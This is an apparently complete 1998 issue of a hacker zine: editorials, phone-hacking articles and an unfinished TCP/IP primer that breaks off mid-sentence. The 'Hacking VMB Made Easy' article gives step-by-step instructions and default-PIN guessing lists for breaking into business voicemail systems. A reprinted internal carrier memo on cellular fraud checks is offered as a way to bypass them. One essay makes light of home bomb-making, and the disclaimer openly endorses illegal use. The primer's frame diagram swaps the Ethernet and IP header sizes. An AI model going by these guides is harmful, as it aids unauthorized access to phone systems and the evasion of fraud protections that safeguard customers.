. .
. . . ,g$p,
.,. $&y .,. `"`
oooy$$$yoo o oooy$$$yoo o
. `$$$'$$$yyyyp,`$$$' gyp . .
. yxxxx $$$ $$$"`"$$$ $$$ $$$ xxxxxxxxxxxxxxy . volume 2
$ $$$ $$7 ly$ $$$ $$$ $ number 6
$ $y$ $$b d$$ $y$ $y$ $ issue 18
. $xxxx $$$ $$$ $$$ $$$ $$$ xxxxxxxxxxxxxx$ .
. """ """ """ """ $$' .
t h e h a v o c $$' t e c h n i c a l j o u r n a l
[January 1, 1998..................$'...........................Happy New Year]
[......................'Putting the hell back in shell'......................]
[Table of Contents...........................................................]
Contacts & Copyrights......................................Staff
Editorial..................................................scud_
The Way It Should Be.......................................shoelace
Bringing Back the Old School...............................Revelation
Hacking VMB Made Easy......................................SSS
Fraud Force System.........................................D-Day
An Introduction to the Internet Protocols..................scud_
Windows NT Vulnerability Theories Version 2................vacuum
Basic Network Architecture, Part II........................lurk3r
blast.c....................................................memor
sendmail885.c..............................................su1d
sendmail885.c (2)..........................................scud_
Scripting in UNIX..........................................Nartrof
ttyread.c and ttywrite.c...................................simon
The Mailroom...............................................scud_
The News...................................................KungFuFox
Reader Survey..............................................Staff
---->NEW Majordomo<----
Subscribe to thtj at: majordomo@orc.ca 'subscribe thtj you@your.isp'
[Contacts & Copyrights..................................................Staff]
[1. Contacts]
Editor in Chief : Scud-O, <scud@thtj.com>
Executive Editor : KungFuFox,
Submissions Editor : Keystroke,
Editing Assistants : FH, Phrax,
News Editor : KungFuFox,
Mail Editor : Scud-O,
Webpage Editor : Scud-O,
Extra Special Thanks : All the writers, and people who filled out
the reader survey.
Shout Outs : All of you in the know.
THTJ Website : http://www.thtj.com/
THTJ e-mail : thtj@thtj.com, scud@thtj.com
[2. Copyrights]
The HAVOC Technical Journal (THTJ) Volume 2, Number 6, Issue 18
January 1st, 1998. *Everything* here is (c) Copyright 1996,1997,1998
by THTJ, HAVOC Bell Systems Publishing, or HNS. All Rights Reserved.
Nothing may be reproduced in whole or in part without written permission from
the Editor in Chief. The articles included here, belong to their writers and
articles are copyrighted by their writers. If you want to use their articles
in your publication, ask them. For more information on our copyrights, and
article submissions policy, please see http://www.thtj.com/submissions.html
For more information on legal stuff goto http://www.thtj.com/legal.html
[No copying THTJ, damnit.]
Articles, comments, whatever should be directed to: scud@thtj.com
Subscribe to thtj at: majordomo@orc.ca 'subscribe thtj you@your.isp'
Disclaimer:
THTJ is provided free of charge, thus THTJ provides NO warranties
whatsoever. You use this zine and its information at your own risk.
While every effort has been taken to ensure the accuracy of the
information contained in this article, the authors, editors, and
contributors of this zine assume no responsibility for errors or
omissions, or for damages resulting from the use of the information
contained herein.
The HAVOC Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
[Actually, to tell you the honest to goodness truth, we
do endorse that stuff. We just don't wanna get in trouble
if you try it for yourself and something goes wrong.]
-------------------> 'Its Not Our Fault' <-------------------
THTJ is protected by the First Amendment of the US of A. If any of the
information contained in this file offends you, then why the hell are
you reading it?
THTJ publishes its information to educate you, if YOU choose to use the
information illegally, so be it. We are not responsible for *YOUR* actions.
We merely provide the information. By reading this zine, you agree to this
policy, and you void all rights to sue us or get us involved in the
consequences of *YOUR* actions. If you can not deal with this policy, then
delete this file now.
Stealing articles, or pieces of articles, or pieces of pieces of articles
from thtj with out permission is a crime against humanity. If you want to
use any of the material in here, please contact THTJ and/or the articles
author. If you do not follow these rules, we may be forced to take legal
action.
NOTICE: if you are a government offical or employee reading this file, you
MUST register with thtj. A registration permit will be mailed to you free
of charge by using either of the mail addresses above. A Registration fee
of $50 is required upon submission of the permit. This will entitle you to
recieve thtj via a private mailing list, or via snail mail on a 3.5 floppy
disk. UNTIL you are officially registered, you MUST DELETE ALL COPIES of
thtj that you have, either in print or on a computer. You CAN NOT read thtj
until you are registered. This is *NOT* optional. If we detect .gov access
from an unregistered person, we will have to take legal action.
[Editorial..............................................................scud_]
Ladies and gentlemen, boys and girls, feast your eyes on the new look
of thtj. This will probably be the look for use for the new few issues, unless
you mail us and say that you are going to kill us all because we aren't good
at ASCII. We are still going to be playing around with this format a bit, so
your comments can help.
I would like to take some time out and address all of the reader
surveys I have recieved. To the hundreds of you that replied, I thank you for
your input, and I hope that the rest of you out there follow the lead of these
people and fill out the survey. Those of you that did fill it out last month,
feel free to fill out the form again and tell us how we are progressing.
A few of you that replied were sysadmins, and most of you said that you wish
that hackers understood that most of these sysadmins are hackers just like you
and me. This is an important point. Many sysadmins out there are a hundred
times better at hacking than alot of the hackers out there. Some sysadmins are
not really hackers and they hate hackers, thus messing up the rep for all
sysadmins. Alot of you also asked if I was interested in articles. The answer
is YES! thtj lives off of the articles that you all submit to us. If it wasn't
for all of you out there that submit articles, thtj would have dried up a long
time ago. So, please help keep this zine going by submit articles to it. If
you would like to submit an article, please send it to me at scud@thtj.com.
I will look the article over, and will try to get back to you, but if I don't,
then the article eihter will or will not be in the next issue of thtj. Well,
I must get back to the Festivus and the feats of strength, so I will not be
able to write a real important editorial this month, but go on and read
shoelace's bickerings below.
[The Way It Should Be, Dammit........................................shoelace]
Alas, yet another lame article but shoefunk (yes, that is also
Shoelace). This one is about how stupid the world really is when it comes
to computer's, hacking, phreaking, bomb making, well, just about anything.
Recently, I was reading the 'Time Digital: Your Guide To Personal
Technology", and came across a small dictionary page, where they defined a
hacker as.. "HACKER: A good guy gone bad. In the early days of computing,
the term was applied to enthusiastic, Jolt cola-swilling programmers who
lacked formal training. Increasingly, though, hacker refers to a kind of
high-tech, disgruntled postal employee--one who breaks into and crashes
corporate and government databases for the sheer hell of it--and for a little
recongnition too." Although this is in some cases true, I see more cases
of people doing it to prove a point. Rather it's to prove that they can do
something, or to let their oppinion out about something, the common 'hacker'
will do the 'hack' for probably more than just the sheer hell of it. You
should always try to prove a point with what you do, even if the point isn't
gonna happen. It get's out faster, and more people will find out about it.
Next subject; phreaking. I don't know about you people out there,
but why is it that if you can set up a teleconferance, that you are elite?
I don't get it.. just because you can go down to a local pay-phone and dial
up ATT Voice Conferancing, post the information, and talk to people, that you
are really, really, really super. I'm not saying that a conf. isn't nice
now and then, and that when someone set's it up, that you don't thank them,
but why worship them? It's just a conf. Why not take apart your phone and
see why it works instead of bribing someone that if they set one up, they will
be rewarded? It's much more gratifing to go and see why something work's,
rather than to charge major cost to someone else. So go unscrew your phone
and pry it open.
Also, what do people think making a pyrodex bomb is gonna do? Just
because you have a lbs. of pyrodex in your room, doesn't mean your gonna
blow up another Oklahoma Municiple Building type explosion. People should
stop worrying about having fireworks and homemade explosions. My friend's
and I make lot's of bombs, and have yet blown up buildings or anything. It's
just something to do.
So enough of all the bitching about Hacking/Phreaking/Bomb's.. just
let whatever's gonna happen, happen. Let bomb's go boom, PLEASE let phreaking
become about understanding phone's and why things happen, and for hacking,
prove a point about why you do something. And for shoelace, shut up already.
-shoelace (shoe@beer.com) (http://www.public.usit.net/sltaylor)
-IRC: undernet - #terrorism, #deathmetal, #phreak
[Bringing Back the Old School......................................Revelation]
0000000000000000000000000000000000000||
0 0||
0 BRINGING BACK THE OLD SCHOOL II 0||
0 By 0||
0 Revelation 0||
0 Hackers.Com 0||
0 0||
0000000000000000000000000000000000000||
|||||||||||||||||||||||||||||||||||||
Many of you may have read my article "Bringing Back The Old School"
in THTJ #12. It got a huge response and so I decided to write a followup on
it, with more of my views and ideas on what the underground is becoming and
what it should be. If you haven't read my previous article, I strongly
suggest you do as a prelude to this.
The Internet was created to be a free place. A place where people can
learn about anything and everything. Yet another tool that will change
society for the better. But, there are always rebels. Rebels do as they
please and refuse to abide by given rules that confine their hunger for
knowledge. The Internet rebels gathered in a non-physical arena known as the
underground. The underground is composed of hackers and phreaks and anyone
with an interest in technology and the determination to learn as much as
possible, regardless of the obstacles. What is life about anyway? In my
opinion, it's about learning. What else is there? There are material things
that occupy most of our time, but what's it all for? Nothing. The only real
thing is knowledge. Someone with the determination to learn all they can
regardless of the obstructions is a great asset to society in general. These
are the people who create things that make life easier to live. These are the
people who theorize and ponder about all that exist, simply because they
want to. Knowledge is not a tangible thing, thus it cannot be taken away.
There are many mediums used for the study and passing of knowledge, the
computer is just one of them. Some people choose books, others television or
radio, we choose the computer.
Hackers have gotten a distorted image for various reasons which I'm
not going to go into, because what's done is done. Hackers originated as
highly skilled computer programmers, and that eventually got distorted into
computer criminals. Now, we are neither. What we are is information seekers.
We just want to learn about all we can, because that's all that really
matters in the long run. We want to learn about not only computers, but
telephones, technology, government, the world in general, and life. We
choose to pursue this knowledge by any means necessary, and on occasion, that
may violate a law or two, but we hurt no one, we harm nothing. We are not
criminals. As soon as the public understands that we will finally be taken
for what we are: people wanting to learn.
Knowledge is taken for granted these days. The underground has lost
its sense of ethics, the ethics of knowledge seeking and non-destruction that
I described above. The underground has become polluted with software pirates,
email bombers, carders, virus spreaders, and anarchists. We must pull away
from those things that corrupt the underground now, or they will eventually
corrupt us few who still believe in the true underground. These unethical,
immoral, and just plain stupid things must be stopped. And stopping them
is easy, but getting everyone to cooperate is not. We can stop these things
by simply refusing to distribute the files that teach these things, because
if you stop the flow of the unethical information, people will turn to the
ethical because it's all that's left. Simply refusing to link to sites that
distribute these files will help too. So that's all you have to do to help
me and Hackers.Com realize our idea of the New School, a return of the Old
School ethics, simply deny the information that is corrupting the underground.
Now, some of you may be thinking: "He stated that all information
should be free and that all hackers want is to pursue information, but then
he stated that we need to stop the flow of information. This doesn't make
sense." Well, actually, it does. I understand what you're thinking, but you
must try to understand what I'm thinking. We choose to pursue pure knowledge
for the simple gain of more knowledge, nothing else. We get no material gain
from our desire to learn. But, those who pirate software, card, etc. are
gaining finances and causing destruction at the same time. I want to stop
the flow of information that does nothing but damage, because this is not
the information which we want to pursue. We want to pursue the information
that creates knowledge, not destroys or corrupts it. It is easier to destroy
than to create, but creating is much more rewarding.
So this is it...this is a major step towards realizing our dream
of freedom, greatness, and ethics among the underground population. Our
determination to get rid of software pirates, carders, virus spreaders,
and anarchists who do nothing but destroy, will overcome them...it's just a
matter of time.
I hope that the things I have discussed in this and my previous
article are of some help to you in the underground and in life. Please study
the things I have written, and think about them, and help me achieve the goal
that I share with every other true hacker out there...bringing back the old
school. If you wish to further discuss these topics with me, or just comment
on my article, you can do so by emailing me at: revelation@hackers.com
Or if you'd like more information on my ideas and my quest to bring back
the Old School, you may visit my web site at: www.hackers.com
There you will find informational resources for the true hacker, and it will
change your life forever. I will never give up...I hope the same is true for
you.
Written By:
Revelation
Hackers.Com
revelation@hackers.com
"Bringing Back The Old School"
[Hacking VMB Made Easy ...................................Super Sharp Shooter]
(mdma@cyberus.ca)
(12/21/97)
Voice Mail Boxes (VMB) I would say is the best way to keep in touch, give
info, or just say hi to someone other then email. But the fun thing with
VMB's is that most of them are 1-800's and you can call them up or check
them from any payphone (for free!) or ANY where in the world.
How do VMB's work?
VMB's are basily computer systems, with passwords, menus, users, with
permissions, and so on. But it is all done by voice and DTMF tones. Just
like computer systems, there are many different VMB systems out there,
some stronger then others, some not. Think of a answering machine, but all
digital and hundreds of them on a box.
First step is finding a VMB system, there are hundreds of 1-800 VMB out
there waiting to be hacked. Pick up a phone (a speaker phone works the
best) and start hand-scanning, 1800-111-0001, 0002, 0003, and so on. You
should only hand-scan after bussiness hours. The best ones are small
bussiness, when you get to one (after hours) you should hear something
like "Hello welcome <blah, blah blah> if you know your parties ID box
number (or pid or ext.) you may dial it now." BINGO, you got one. Try out
all the menu's and get a feel for the system.
Ok I found a VMB system now what?
First you have to get to the VMB system (after all this is a computer not
only running VMB's), most of the time its '#' or '*' as soon as you hear
the MAIN welcome message of the company. Next you have to know how long
the box numbers, you can find this out by going to the main menu and you
should hear something like, "If you want you hear the directury of people
(users) press #" hit # and listen to the listenings. Example "John Doe box
546....Jonny Down box 538" and so on. Most systems have 3 digits long
boxes, and the super-user usally places the users in groups like 2XX for
marketing section, 6XX for accounting and so on, so listen and write down
all the groups when listening to the directiry list. If you hear that the
2xx's group are active listen to the last box number in the group and
right it down. Most of the time sysadmins add extra boxes so they cam add
users to the group. The extra ones will be your target, why? Well its
easyer to hack into, and when you get one it will take a lot longer for
the sysadmins to find out that you hacked a box on the system. The main
goal is too find an EMPTY box, after you found an empty box, the next step
is the longest and you need luck. All VMB systems have default settings,
for example when you set up a box (as the sysadmin) the passwd could be
the same as the box number, ie: box 123, passwd 123. First you have to
find length of the passwd, you can do this by putting in the box number
first then it will ask you for the passwd (or pin number) first press the
1 button (doesnt have to be the one button) then wait a few secs, then
2..wait....then 3...wait keep doing until the lady says "Wrong Pin Number,
please try again!" Just make sure you do it slow. Now that you know the
passwd length here are some common defaults you should try first:
1) same box passwd -=- box is 902 try 902 for passwd
2) reverse passwd -=- box is 902 try 209 for passwd
3) add 1,2,3+ passwd -=- box is 902 try 9021 for passwd, 9022, 9023, etc.
4) Year passwd -=- 1997, or 1998 whatever year we are in
More:
_4 digit passwd_ _5 Digit Passwd_ _6 Digit Passwd_
0000 00000 000000
1111 11111 111111
2222 22222 222222
3333 33333 333333
4444 44444 444444
5555 55555 555555
6666 66666 666666
7777 77777 777777
8888 88888 888888
9999 99999 999999
And the list goes on and on.....just use your head. Try shit like 1234,
4321, and just look at your telephone keypad and look for patterns.
Just dont give up.
I GOT ONE!! Now what?
Once you get into a box you will hear a number of menus, the first thing
you should do is check to see if there are any new or saved messages on
the box, if so listen to them and pay attention to the date of the
message. If you have found an empty box you dont have to worry about this,
but if you hacked into someone's box this is important. If the dates on
the messages are old (ie: 1+ months) then there is a good chance that your
new box will not get killed, but if the messages are a few days (or hours)
old then dont fuck with anything and try to hack a new box. If you screw
with that box like delete messages, change passwd on the box, the owner
will tell the sysadmin and you will lose it anyways, and then the sysadmin
how hackers are trying to break into the system.
Once you feel that the box you have is safe, its up to you what to do.
Change the voice greeting message, passwd, some VMB systems have wake up
calls, which is wicked, think about it, you can put ANYONE's phone number
in and time (ie: 4:00am) in North America to wake them up, or piss them
off. Just look around on each menu so get a feel for it.
Most of the time sysadmins are box number 999, 998. So if your lucky and
can hack a sysdmin box you can make new groups, new boxes for all your
friends. If you do hack the sysadmin box just make a few boxes and leave,
dont change the sysadmin's passwd or delete any messages.
Play Safe, and Have Phun.
Super Sharp Shooter -+- 1.800.234.1136 BOX 999
"Phreaking For Phun"
http://www.cyberus.ca/~mdma/phreak
NPA 613
[Fraud Force System.....................................................D-Day]
Century Cellunets New "Fraud Force System"
Technical Interoffice Data
People in the Baton Rouge,New Orleans Lousiana and surrounding
towns may find some use in the following file. It douments the structure
of the "Fraud Force" System being implemented into these locations cell
sites and switches. It is unknown if it will affect landline systems,but
from the way it works,it is doubtful.
EOC---------------------------------------------------------------------EOC
Interoffice Memorandum
Date:Febuary 18,1997 File:FRAUDFOR
To:Div/Dist Managers
Office Managers
Chris Nolen
Barry Gugliuzza
FROM: Phyllis May
SUBJECT: Fraud Force Use In Fraud Markets
Laura Graham developed the following procedure for the Customer Service
Center to be used when customers are using the phones in high fraud markets
where Fraud Force has been implemented.
The following details are unique to Region 1 and the Force implementation.
Fraud Force will start with the Baton Rouge system the week ending
Feb 28. Other markets will be added as needed.
All Louisiana,Arkansas and Texarkana cellulars in this sytem will be
routed through Fraud Force.
Calls will be routed to Customer Service.
Please direct any questions to Jim Burnham at 318/683-3429 or Rhonda Woodard
at 318/683-3427.
(page 2)
Overview:
Purpose: FraudForce is a system implemented by Century,to help combat cloning
fraud for our customers roaming in high fraud areas. Affected markets will
be included as needed,those which are found to have high fraud rates.
(page 3)
Following is an overview of the verification process for Century customers
using cell service for the first time in a FF market. For detailed
instructions,see "Verification Process"
Step| Action
1.Customer places first call to any number.
2.Call is routed (hotlined) to FraudForce,where an Interactive Voice Response
(IVR) prompts the user to enter their 10 digit cell number,which is verified
ending with the pound key. The customer has three (3) tries to enter their
number correctly.
3.Call is transferred to Century Cellunet's customer service center.
-Valid customers will contimue to step 4
-Invalid customers are instructed to make another call and
re-enter the correct cell number.
4.The customer information is verified to confirm the cell user is valid.
- ------------------------ -----------------------------------------
|If Information Is | The CSR |
----------------------------------------------------------------------
| verified, | explains the call credit and |
| | procedure to establish PIN. Go to step 5|
|-------------------------- ------------------------------------------
| not verified, | presses 0 on their keypad to transfer to|
| | a recording explaining the caller is |
| | denied. |
|__________________________|_________________________________________|
5.The CSR presses 1 to transfer the call to the FraudForce IVR,and the
customer interactively uses their phone keypad to establish a 4 digit PIN.
6.If a billed call,the CSR notes the length of the call and credits the
customers account(length of call X roaming airtime rate) to AFDFC. This
is because the customer incurred airtime charges during verification and
PIN selection.
(page 3)
ESTABLISHING AND USING A PIN
Hours accesible: Any normal working hours. Customers after hours will be
directed to call during normal hours.
Call types: There are two types of FraudForce calls.
Fraud Force 1 These are calls where the customer entered a valid 10
------------- digit cell number when prompted after the inital hotline.
There are customers who had previously established a PIN,
however entered it incorrectly and must repeat the
verification process,or are making their first call in the
FraudForce market verifying for the first time.
Fraud Force 3 These are calls where the customer entered an invalid 10
------------- digit cell number or pressed zero (0) for assistance.(the
customer has three tries to enter their cell # correctly.)
The customer can not be verified without entering a valid
10 digit number. They are instructed to attempt the call
again,so they recieve the IVR prompts to enter the 10
digit number correctly.
PIN DETAILS: The PIN is four digits and should not start with zero.
The PIN is not accesable to Century. The customer must
remember their PIN.
Once established,the PIN is valid in that market until Century
removed it and the customer calls the IVR to establish a new
one. This can be done if the user forgets their PIN or if the
usage/user appears to be fraudulent and Century needs to block
service.
A PIN must be established in each FraudForce market. The same
PIN may be used in every FraudForce market,or different PINs
may be used.
Different customers MAY have the same PIN.
The customer will periodically be asked to enter the PIN
before making a call.
A user has 3 tried to enter the PIN correctly. On the 4th
try,the call will be directed to Fraud Force 1.
(page 4)
VERIFICATION PROCEDURES
The following are the procedures for a FraudForce 1 call.
1.Customer first places call to any number.
2.Caller is hotlined to FraudForce,where an IVR prompts the user to enter
their 10 digit cell phone number and the pound key.
3.When entered correctly,the call is transferred to Century's customer
service center,with the following introduction "Please verify your 10 digit
cellular number. Press any key to accept this call."
4.The CSR presses any key on their phone to accept the call and says to the
caller,Century Cellunet,This is (name) You are currently roaming in a high
cellular fraud area. For your protection and ours,will you verify some
account information to enable you to establish a Personal Identification
Number,or PIN.
5.Important:Customer information must be verified to confirm the account
holder,secondary authorization holders,or buisiness account cellular
users are valid before given access to establising a PIN.
Individal Accounts:
What city are you currently in?
What is your mobile number?
What is your name?
If user differs from account name,What is the name on the account?
What is your Social Security Number?
If the Social Security number is not verified,verify one of the following:
What is the account's billing address?
What is your home phone number?
What is your work number?
Business Accounts:
What city are you currently in?
What is your mobile number?
What is your name?
What is the account name?
What is the accounts billing address?
The general billing address is okay,if not verified at all (customer does not
know)verify the following:
What is your work phone number?
(page 5)
If information is verified:
Thank you for your cooperation.
If a billed call-You will recieve credit for this call.
If a free call-This is a free call.
I am now returning you to the system so you can set up your PIN.
The CSR presses 1 on their keypad to transfer to the FraudForce IVR to
establish their PIN.
If Information is NOT verifed:
I am unable to authorize the information you have given;and presses 0
on their keypad to transfer the call to a recording explaining the call
is denied. (no dont give out account information)
7. The CSR tickles the cutomers account using an action code of PENDF.
Include the 1- digit cellular number,FF,whether or not the customer
was verified.
(page 6)(End of Memo)
I would have typed the rest of this file,but its just basically a list of
customers questions and alternate places for the caller to be transferred.
Nothing you pretty much need to know about the system,but if you keep a copy
of this on hand,you may be able to bypass. You have what the operator is
looking at,you know what shes going to do. Use this information,dont flaunt
it. Century is a good corporation,but sometimes you need a cell! Remember,
if updates to this file are made,I will be sure to send them out to the
public.
UPDATE: I have just discovered that FraudForce is now being implemented in
almost all cities around the country that use Century. Now this is a serious
problem.
[An Introduction to the Internet Protocolos.............................scud_]
It seems that everyone is covering this topic for an article, so I
figured that it was high time that I toss my hat into the ring and muck
things up a bit more. This is merely and introduction, so I am not going to
go into the formats for TCP and UDP headers and packets, well at least not in
this version of this document. TCP/IP and all of the other Internet protocols
take up whole books (and volumes of books) to fully explain. If you want to
learn more, check out the local B&N or Borders, and pick up a book on TCP/IP.
[ Editor's Note: The deadline for this issue came up too fast, so I
was unable to finish this whole text. There is still a good into to TCP and
UDP, so read it, and next month I will hopefully complete this Introduction
with the rest of the gang of Internet Protocols.]
The Internet is the world's busiest and the only true worldwide
network for all types of computers and people to use. What follows is an
Introduction to the protocols that make the Internet work.
There are a wide range of protocols that the Internet uses to connect
to other computers all over the world. However, since the Internet was
started on UNIX, the UNIX standards of networking are what the Internet
mainly uses to connect computers together. The UNIX protocols are often
referred to as TCP/IP for Transmission Control Protocol/Internet Protocol.
This is really in two parts, the TCP is an upper layer for data transport,
and the IP is a lower level network layer, but more on this in a bit.
Although several other methods are used for other services, TCP/IP is the
most commonly used protocol grouping, so we will cover TCP/IP first.
Before we delve into TCP/IP, we must first understand the model that
the Internet's protocols are developed on. Welcome to OSI.
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
OSI - The Open Systems Interconnect Reference Model
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The Open Systems Interconnect (OSI) Reference Model was part of a
project by the International Organization for Standardization (ISO). The
ISO OSI network protocol architecture scheme never really caught on, but the
TCP/IP protocol uses the basic groundwork that OSI started. The model
consists of 7 layers, with each layer building on the layers below it, and
providing specific functionality. Each layer has its own unique
characteristics, and as a whole, the OSI model enables network communication.
The software implentation of such a layered model is appropriately termed as
a protocol stack.
User applications insert information into one layer and each layer
specially encapsulates the data until the bottom layer has been reached, and
this physical layer moves the data down the line to its destination,
occasionally having the layers translated from the bottom up as the data is
transported.
The OSI Model looks like below:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 7. Application Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 6. Presentation Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 5. Session Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 4. Transport Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 3. Network Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 2. Data Link Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 1. Physical Layer ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
The layers have specific roles as I have said, each refraining from
intruding into the domains of the other layers. The Units exchanged are the
units of information that is passed in that layer.
o Application Layer: Contains the network applications with
which people interact, such as mail, ftp, rlogin, etc.
Units exchanged: message
o Presentation Layer: Creates common data structures.
Units exchanged: message
o Session Layer: Manages connections between network
applications.
Units exchanged: message
o Transport Layer: Ensures that data is recieved exactly as
it was sent.
Units exchanged: message
o Network Layer: Routes data through various physical networks
while traveling to a known host.
Units exchanged: packets
o Data Link Layer: Transmits and receives packets of
information reliably across a uniform physical network.
Units exchanged: frames
o Physical Layer: Defines the physical properties of the
network, such as voltage levels, cable types, interface pins
and other such fun things.
Units exchanged: bits
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The TCP/IP Network Model
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The OSI model informs an understanding of the TCP/IP communication
architecture. When TCP/IP is viewed as a layered model, there are usually
4 layers that are seen to compose TCP/IP:
o Application
o Transport
o Network
o Link
As with OSI, each TCP/IP layer has its own unique job:
Applications Layer: Network applications depend on the definition of
a clear dialog. In a client-server system, the
client application knows how to request something,
and the server knows how to respond to that
request. Examples of this include FTP, HTTP, etc.
Transport Layer: The transport layer allows network applications to
obtain messages over clearly defined channels and
with specific characteristics. The two protocols
within the TCP/IP suite that generally implement this
layer are TCP (Transmission Control Protocol) and
UDP (User Datagram Protocol).
Network Layer: The network layer allows information to be transmitted
to any machine on the contigous TCP/IP network,
regardless of the different physical networks that
intervene. The Internet Protocol (IP) is the common
mechanism for transmitting data within this layer.
Link Layer: The link layer consists of the low level protocols used
to transmit data to machines on the same physical network.
Protocols that are not part of the TCP/IP suite, such as
Ethernet, Token Ring, FDDI, ATM, etc. implement this layer.
A 2 system TCP/IP connection would look something like below:
System 1 (client) System 2 (server)
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Application ³ ³ Application ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Transport ³ ³ Transport ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Network ³ ³ Network ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ Physical ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Data Link ³<------------------------------------------>³ Data Link ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Network ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Data within these layers is usually encapsulated with a common
mechanism; protocols have a header, identifying meta-information such as
the source, the destination, and other important attributes, and a data
portion that contains the actual information. The protocols from the upper
layers are encapsulated within the data portion of the lower ones. When
traveling back up the protocol stack, the information is reconstructed as
it is delivered to each layer.
ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿
Application Layer: ³ Header ³ Data ³
ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿
Transport Layer: ³ Header ³ | Data ³
ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
Network Layer: ³ Header ³ | Data ³
ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
Link Layer: ³ Header ³ | Data ³
ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
For example, a 200 byte TFTP packet using UDP/IP over Ethernet
might look a little something like:
ÚÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿
³ Ethernet ³ IP ³ UDP ³ TFTP ³ Data ³ Ethernet ³
³ Header ³ Header ³ Header ³ Header ³ ³ Trailer ³
ÀÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙ
(bytes) 20 14 8 4 200 4
This adds up to a total Ethernet frame size of 250 bytes.
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The TCP/IP Protcols: The Internet Protocol (IP)
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
IP is the cornerstone of the TCP/IP suite. Every piece of data on
